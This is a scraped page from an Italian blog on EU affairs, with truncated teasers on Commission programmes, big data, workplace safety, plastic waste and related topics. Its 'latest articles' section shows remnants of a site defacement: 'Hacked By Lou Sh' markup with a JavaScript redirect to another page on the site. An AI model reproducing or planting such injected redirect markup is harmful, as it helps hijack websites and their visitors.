EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Commissione europea

it

A distanza di due mesi dall’accordo di partenariato tra la Commissione europea e la Francia per definire la migliore strategia per l’utilizzo dei fondi europei, lo scorso 10 ottobre la Commissione europea ha approvato il programma operativo francese per l’attuazione del Fondo sociale europeo (FSE) nella Francia continentale per il periodo 2014-2020.

Il fondo sociale europeo (FSE) ha un ruolo decisivo nel supportare gli investimenti degli Stati membri per ciò che riguarda il capitale umano e aiuta a sostenere la competizione economica europea. Assiste ogni anno 15 milioni di persone per sostenerle nelle loro competenze, per aiutarle ad (...)

it

L’accordo stretto lo scorso 13 ottobre tra la Commissione e l’industria europea dei dati prevede un investimento di 2,5 miliardi di euro destinati alla gestione dei big data. In questo modo l’Europa potrà portarsi al pari degli altri Stati a livello mondiale. L’intesa sarà attiva a partire dal 1° gennaio 2015.

Investire nei megadati porterebbe alla creazione di circa 100.000 nuovi posti di lavoro entro il 2020 e potrebbe ridurre del 10% i consumi energetici in Europa, sviluppare l’assistenza sanitaria e avere a disposizione macchinari industriali più efficienti.

L’intesa in materia di megadati è (...)

it

Lo scorso 1 luglio la Commissione europea ha varato una prima parte di modifiche importanti per aggiornare il “Progetto pilota comune”, il sistema europeo di trasporto aereo (ATM- Air Traffic Management).

La SESAR, Single European Sky ATM Research, è promotrice di questo programma che non è l’unico in gioco ma fa parte di una serie di progetti molto più ampi. L’obiettivo della SESAR è quello di poter migliorare il trasporto aereo per i cieli europei attraverso la modernizzazione degli scambi da e per (...)

it

Investire in una cultura della prevenzione dei rischi, garantendo condizioni migliori sul posto di lavoro, può offrire vantaggi non soltanto sociali ma anche economici, specie in una situazione di crisi come quella odierna. Per questo la Commissione europea ha presentato a Bruxelles un nuovo quadro strategico in materia di salute e sicurezza sul lavoro, con la speranza di bissare i risultati positivi ottenuti nel periodo 2007-2012.

Ogni anno sono più di 3 milioni i lavoratori europei vittime di gravi infortuni sul lavoro, 4 mila dei quali mortali. Infortuni che, insieme alle malattie professionali, colpiscono - come ha ricordato László Andor , Commissario europeo per l’Occupazione, gli affari sociali e l’inclusione - “tutti i (...)

it

Martedì 11 febbraio, in oltre 100 Paesi (e per la prima volta anche negli Stati Uniti), è stato celebrato il Safer Internet Day, un’iniziativa della Commissione europea, giunta ormai all’undicesima edizione, che ha avuto come fine quello di promuovere, soprattutto tra i più giovani, un utilizzo sicuro e responsabile dei media.

Erano gli anni Sessanta quando il Dipartimento di Difesa statunitense decise di collegare tra di loro alcune università che si occupavano di progetti militari, sfruttando linee di telecomunicazione ad alta velocità. L’obiettivo era semplice: mettere a punto un sistema di difesa e di (...)

it

Il Parlamento europeo ha recentemente approvato una risoluzione secondo la quale entro il 2020 alcuni dei rifiuti plastici più pericolosi per l’uomo e inquinanti per l’ambiente dovranno essere banditi. L’Unione europea, inoltre, dovrà impegnarsi affinché vengano introdotti obiettivi in materia di raccolta, riciclaggio e recupero della plastica che risultino vincolanti per tutti gli Stati membri.

L’enorme potenziale economico derivante dal riciclaggio di materiale plastico è in gran parte inutilizzato; ad oggi, infatti, soltanto il 25% dei rifiuti plastici viene smaltito correttamente. È quanto denunciato dal Parlamento europeo, nella risoluzione approvata martedì 14 gennaio. Un dato (...)

it

Le controversie di modesta entità sono i procedimenti giudiziali il cui valore è fissato, da un precedente regolamento europeo (il regolamento n. 861/2007) a massimo 2000 euro, che coinvolgono cittadini di due Stati membri diversi, che hanno bisogno di un modo rapido e poco costoso di giungere alla soluzione della loro lite.

L’esempio che la Commissione ha in mente è questo: fornire una strada “cheap” per coloro che vorrebbero indietro il proprio denaro dopo aver acquistato un televisore online da un venditore straniero, ma non averlo mai ricevuto. Quasi nessuno, in tempi di crisi, si imbarcherebbe in una causa da (...)

it

Occupazione e crescita: sono questi le principali prerogative del nuovo piano di lavoro della Commissione per il 2014. L’Unione Europea si impegnerà e lavorerà per contrastare la disoccupazione giovanile, per aumentare la crescita in tutti gli Stati membri e infine per mettere in atto le proposte che sono ancora rimaste in sospeso.

Il 22 ottobre scorso la Commissione europea ha adottato e pubblicato il suo programma di lavoro per il prossimo anno. In un periodo economicamente difficile, gli sforzi dell’Europa si concentreranno maggiormente su temi quali l’occupazione e la crescita, in particolar modo ci si soffermerà (...)

it

Due terzi degli europei non svolge attività fisica oppure la pratica raramente. Il rischio di aumento dell’obesità e delle patologie ad essa collegate ha spinto le Istituzioni europee all'azione. La proposta della Commissione passerà ora all'analisi del Consiglio, che potrebbe adottarla già entro la fine di quest’anno.

Fare attività fisica fa bene alla salute. Svolgere una qualsiasi forma di sport, oltre a migliorare la qualità della vita, permette a uomini, donne, giovani e meno giovani di combattere in maniera indiscutibile la sedentarietà, l’obesità e di prevenire anche le malattie legate a quest’ultima. Ma (...)

it

La Commissione europea ha scelto Roma come sede del nuovo evento, per mostrare come lo spazio e le sue applicazioni possano offrire vantaggi alla vita quotidiana di tutti i cittadini europei.

La possibilità che questo evento concede tanto ai cittadini, quanto agli studenti che si interessano all’astrofisica, è quella di scoprire i principali progetti spaziali che rievocano alla mente grandi nomi, quali Galileo, il programma europeo di navigazione satellitare, o Copernicus, il programma (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France